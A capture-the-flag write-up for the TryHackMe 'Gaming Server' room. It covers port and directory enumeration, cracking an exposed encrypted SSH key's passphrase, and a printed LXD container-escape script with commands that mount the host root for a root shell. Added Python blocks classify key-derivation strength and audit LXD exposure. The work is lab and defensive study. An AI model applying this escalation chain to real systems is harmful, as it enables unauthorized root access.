THM - Gaming Server

Gaming Server

skibum 8/30/2020

Enumeration

1. nmap scan

```bash
sudo nmap -sS -sC -O <Machine_IP>
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 21:26 CDT
Nmap scan report for <Machine_IP>
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http
|_http-title: House of danak
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 4 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.31 seconds
```
2. There are two ports open: one is an HTTP server and the other is SSH. Let's start with the HTTP server.

2.1. Check the HTTP server

```bash
wfuzz -w /usr/share/dirb/wordlists/big.txt -u "http://<Machine-IP>/FUZZ" --hc 404 -c
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://<Machine-IP>/FUZZ
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000015:   403        9 L      28 W     276 Ch      ".htaccess"
000000016:   403        9 L      28 W     276 Ch      ".htpasswd"
000015551:   200        3 L      5 W      33 Ch       "robots.txt"
000016077:   301        9 L      28 W     311 Ch      "secret"
000016215:   403        9 L      28 W     276 Ch      "server-status"
000018777:   301        9 L      28 W     312 Ch      "uploads"

Total time: 562.5507
Processed Requests: 20469
Filtered Requests: 20463
Requests/sec.: 36.38605
```

2.2. Look at robots.txt

```
user-agent: *
Allow: /
/uploads/
```

2.3. Now let's check out http://<Machine-IP>/uploads

  • There is a password-cracking dictionary there and a hacker manifesto.

2.4. Now let's check out the secret folder http://<Machine-IP>/secret

  • There is a secret key in the folder (an encrypted RSA private key; the key body is omitted here):

```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

-----END RSA PRIVATE KEY-----
```

3. When using the key for SSH it asks for a passphrase (not sure yet whether the usernames are correct).

4. Crack the key's passphrase using John the Ripper: the passphrase is `letmein`.

5. Now `ssh -i secretkey john@<Machine-IP>` into the box to get the user.txt flag.
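The key under /secret is in the legacy OpenSSL PEM layout (`Proc-Type: 4,ENCRYPTED` plus `DEK-Info`), where the passphrase is stretched with a single MD5 pass, which is why john recovers a short passphrase so quickly; keys written with `ssh-keygen -o -a <rounds>` use the bcrypt KDF instead. As an added example (not code from the writeup or the room), the classifier below tells the two formats apart and reports the KDF and round count; it assumes the standard openssh-key-v1 header order (magic, ciphername, kdfname, kdfoptions), reuses the headers shown above with a placeholder body, and builds its own header-only openssh-key-v1 sample.

```python
import base64
import re
import struct
MAGIC = b"openssh-key-v1\x00"
# Constructed sample with the same legacy PEM headers as the key found under /secret;
# the body is a placeholder, not real key material.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
-----END RSA PRIVATE KEY-----
"""

def _pack(data: bytes) -> bytes:            # SSH wire "string": uint32 length + bytes
    return struct.pack(">I", len(data)) + data

def _unpack(buf: bytes, pos: int):
    n = struct.unpack(">I", buf[pos:pos + 4])[0]
    return buf[pos + 4:pos + 4 + n], pos + 4 + n

def make_openssh_sample(kdf: str = "bcrypt", rounds: int = 16) -> str:
    """Header-only openssh-key-v1 file (constructed, carries no key) for exercising the classifier."""
    opts = _pack(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    cipher = b"aes256-ctr" if kdf == "bcrypt" else b"none"
    blob = base64.b64encode(MAGIC + _pack(cipher) + _pack(kdf.encode()) + _pack(opts)).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % blob

def classify_private_key(pem: str) -> dict:
    """Report format, cipher, KDF, rounds and a verdict on resistance to offline passphrase guessing."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem:
        blob = base64.b64decode("".join(l for l in pem.splitlines() if not l.startswith("-----")))
        if not blob.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 file")
        cipher, pos = _unpack(blob, len(MAGIC))
        kdf, pos = _unpack(blob, pos)
        opts, _ = _unpack(blob, pos)
        rounds = struct.unpack(">I", opts[-4:])[0] if kdf == b"bcrypt" else 0  # kdfoptions ends with uint32 rounds
        if kdf == b"none":
            verdict = "critical: no passphrase"
        else:
            verdict = ("ok" if rounds >= 16 else "weak") + ": bcrypt KDF with %d rounds" % rounds
        return {"format": "openssh-v1", "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds, "verdict": verdict}
    m = re.search(r"^DEK-Info:\s*([\w-]+),([0-9A-Fa-f]+)", pem, re.M)
    if "Proc-Type: 4,ENCRYPTED" in pem and m:
        # OpenSSL derives the PEM key with a single MD5 pass (EVP_BytesToKey), so each guess costs one hash
        return {"format": "legacy-pem", "cipher": m.group(1), "kdf": "md5-evp-bytestokey", "rounds": 1,
                "verdict": "weak: single-iteration MD5 key derivation, offline guessing is fast"}
    return {"format": "legacy-pem", "cipher": "none", "kdf": "none", "rounds": 0, "verdict": "critical: no passphrase"}
```

Run it over a real key file's contents to decide whether the key should be regenerated with the bcrypt KDF and a higher round count.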

## Possible Creds

From the pages, the names that stand out are "The Mentor" and, from the reverse image search, Beaker.
- [ ] The Mentor
- [ ] Beaker
- [x] John, from a comment in the html. This is the correct username.

## Priv Esc
1. Run linpeas.sh to see possible privilege-escalation methods.
    1. LXD shows up as a method of attack.
2. Review the method using searchsploit:
```bash
#!/usr/bin/env bash

# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#          Victor Lasa      (vowkin)
# ----------------------------------

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi
```
  1. Follow the procedure in the method of attack for Ubuntu 18.04:
  2. `lxc image import ./alpine-v3.12-x86_64-20200905_1639.tar.gz --alias myimage`
  3. `lxc init myimage ignite -c security.privileged=true`
  4. `lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true`
  5. `lxc start ignite`
  6. `lxc exec ignite /bin/sh`

P0wn3d!!

  1. Now we have a root shell. Find the flag under `/mnt/root/root/root.txt`.
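From the defender's side, this path needs two things: a user who can reach the LXD socket without sudo (membership of the `lxd` group) and a container that is both `security.privileged=true` and has a disk device whose source is the host root. As an added example that is not part of the writeup, the audit below parses constructed `lxc config show` and `/etc/group` samples and flags exactly that combination; the user, container and device names in the samples are illustrative, not captured from the box.

```python
# Constructed sample of `lxc config show <name> --expanded` for a container like the one built above.
SAMPLE_CONFIG = """\
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    source: /
    type: disk
  root:
    pool: default
    type: disk
"""
# Constructed /etc/group excerpt; lxd membership is what lets a user create containers without sudo.
SAMPLE_GROUP = "sudo:x:27:\nlxd:x:108:john\n"

def parse_lxc_config(text: str) -> dict:
    """Minimal parser for the indented key/value YAML that lxc prints (no PyYAML needed)."""
    stack = [(-1, {})]                      # (indent, mapping) for each open level
    for line in text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        value = value.strip().strip('"')
        while stack[-1][0] >= indent:       # close deeper or sibling levels
            stack.pop()
        parent = stack[-1][1]
        if value:
            parent[key] = value
        else:                               # "key:" opens a nested mapping
            parent[key] = {}
            stack.append((indent, parent[key]))
    return stack[0][1]

def lxd_group_members(group_file: str) -> list:
    """Users who can reach the LXD socket without sudo, the precondition for this privesc."""
    for line in group_file.splitlines():
        fields = line.split(":")
        if fields[0] == "lxd" and len(fields) == 4:
            return [u for u in fields[3].split(",") if u]
    return []

def host_escape_findings(config: dict) -> dict:
    """Flag the combination used above: privileged container plus a disk device sourcing the host root."""
    privileged = config.get("config", {}).get("security.privileged") == "true"
    host_root = [name for name, dev in config.get("devices", {}).items()
                 if dev.get("type") == "disk" and dev.get("source", "x").rstrip("/") == ""]
    return {"privileged": privileged, "host_root_devices": host_root,
            "exploitable": privileged and bool(host_root)}
```

On a live host, feed it the real `/etc/group` and the output of `lxc config show <name> --expanded` for each container; an empty lxd group and no privileged host-root mounts closes this path.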
